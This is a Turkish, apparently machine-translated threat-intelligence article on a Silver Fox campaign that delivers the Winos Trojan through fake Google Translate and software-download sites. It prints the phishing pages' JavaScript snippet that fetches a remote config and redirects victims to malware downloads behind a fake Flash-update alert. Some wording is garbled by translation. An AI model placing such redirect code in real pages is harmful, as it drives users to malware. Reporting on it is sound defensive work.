Popüler çevrimiçi araçların, özellikle Google Çeviri Arabirimlerinin silahlandırılmış sürümleri aracılığıyla şüphesiz kullanıcıları hedefleyen sofistike bir kötü amaçlı yazılım kampanyası ortaya çıktı.
Silver Fox Tehdit Oyuncuları, kullanıcıların meşru web hizmetlerine olan güvenini kullanan kötü amaçlı yazılım dağıtım tekniklerinde önemli bir evrimi temsil eden, kötü şöhretli Winos Truva Truva atiklerini sunmak için sosyal mühendislik taktiklerini kullanan karmaşık bir saldırı zinciri geliştirdi.
.webp)
Saldırı metodolojisi, WPS Office gibi popüler uygulamalar için sahte google çeviri portalları, para dönüştürücüler ve yazılım indirme sayfaları oluşturan saldırganlarla yaygın olarak kullanılan uygulamalar ve web sitelerinin ikna edici kopyalarını yaratmaya odaklanıyor.
.webp)
Kullanıcılar bu kötü niyetli sitelerle etkileşime girdiğinde, onları kötü niyetli kurulum paketlerini barındıran saldırgan kontrollü indirme sunucularına yönlendiren aldatıcı flash güncelleme istemleriyle karşılaşırlar.
Bilensec 404 ekip araştırmacıları, bu kampanyayı 2024’ten beri aktif olan daha geniş bir Silver Fox operasyonunun bir parçası olarak tanımladılar ve tehdit aktörleri sosyal mühendislik yaklaşımlarında dikkate değer bir uyum gösterdi.
Araştırmacılar, bu özel varyantın, özellikle çeviri hizmetleri ve verimlilik araçları arayan kullanıcıları hedeflediği için geleneksel kötü amaçlı yazılım dağıtım yöntemlerinden önemli bir ayrılmayı temsil ettiğini belirtti.
.webp){kind=spacer}
Enfeksiyon mekanizması, Saldırganların kimlik avı web sitelerine dikkatle hazırlanmış JavaScript kodunu yerleştirerek sofistike teknik uygulamayı ortaya koyuyor.
Kötü amaçlı komut dosyası gizli giriş öğeleri oluşturur ve sahte flash güncelleme bildirimlerini göstermeden önce uzak json dosyalarından yapılandırma verilerini getirmeye çalışır.
Gömülü yönlendirme betiği, saldırganların teknik yeterliliğini gösterir:-
fetch('url.json')
.then(response => response.json())
.then(data => {
const urlToUse = data[0];
document.body.addEventListener('click', function() {
alert("检测Flash版本过低,请安装后插件重试!");
});
window.location.href = urlToUse;
});Başarılı kurulum üzerine, kötü amaçlı yazılım, Javaw.exe, microsoftData.exe ve tehlikeli sistemlere kalıcı erişim sağlayan çeşitli destekleyici dosyalar dahil olmak üzere birden fazla bileşeni dağıtır.
Meşru Microsoft yazılımı olarak görünen Winos Trojan, ekran görüntüsü yakalama, keyloglama ve pano izleme işlevleri gibi kapsamlı veri hırsızlığı özelliklerini uygular.
Kampanyanın kalıcılık mekanizması, uzun vadeli sistem uzlaşmasını sağlamak için kayıt defteri manipülasyonunu içeriyor ve kötü amaçlı yazılımların kendisini Windows başlangıç konumlarına yazıyor.
Analiz, nihai yükün, program veritabanında “Rexrat4.0.3” referanslarını içerdiğini ve bu da siber suç faaliyetleri için yeniden tasarlanmış ticari olarak mevcut uzaktan erişim araçlarının kullanımını gösterdiğini ortaya koymaktadır.
Bu Silver Fox kampanyası, tehdit aktörlerinin ilk uzlaşmayı elde etmek için teknik istismarlardan ziyade sosyal mühendisliğe güvendiği, kullanıcı eğitimi ve farkındalığı örgütsel siber güvenlik stratejilerinin önemli bileşenleri haline getirdiği kötü amaçlı yazılım dağılımındaki bir eğilimi temsil ediyor.
Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin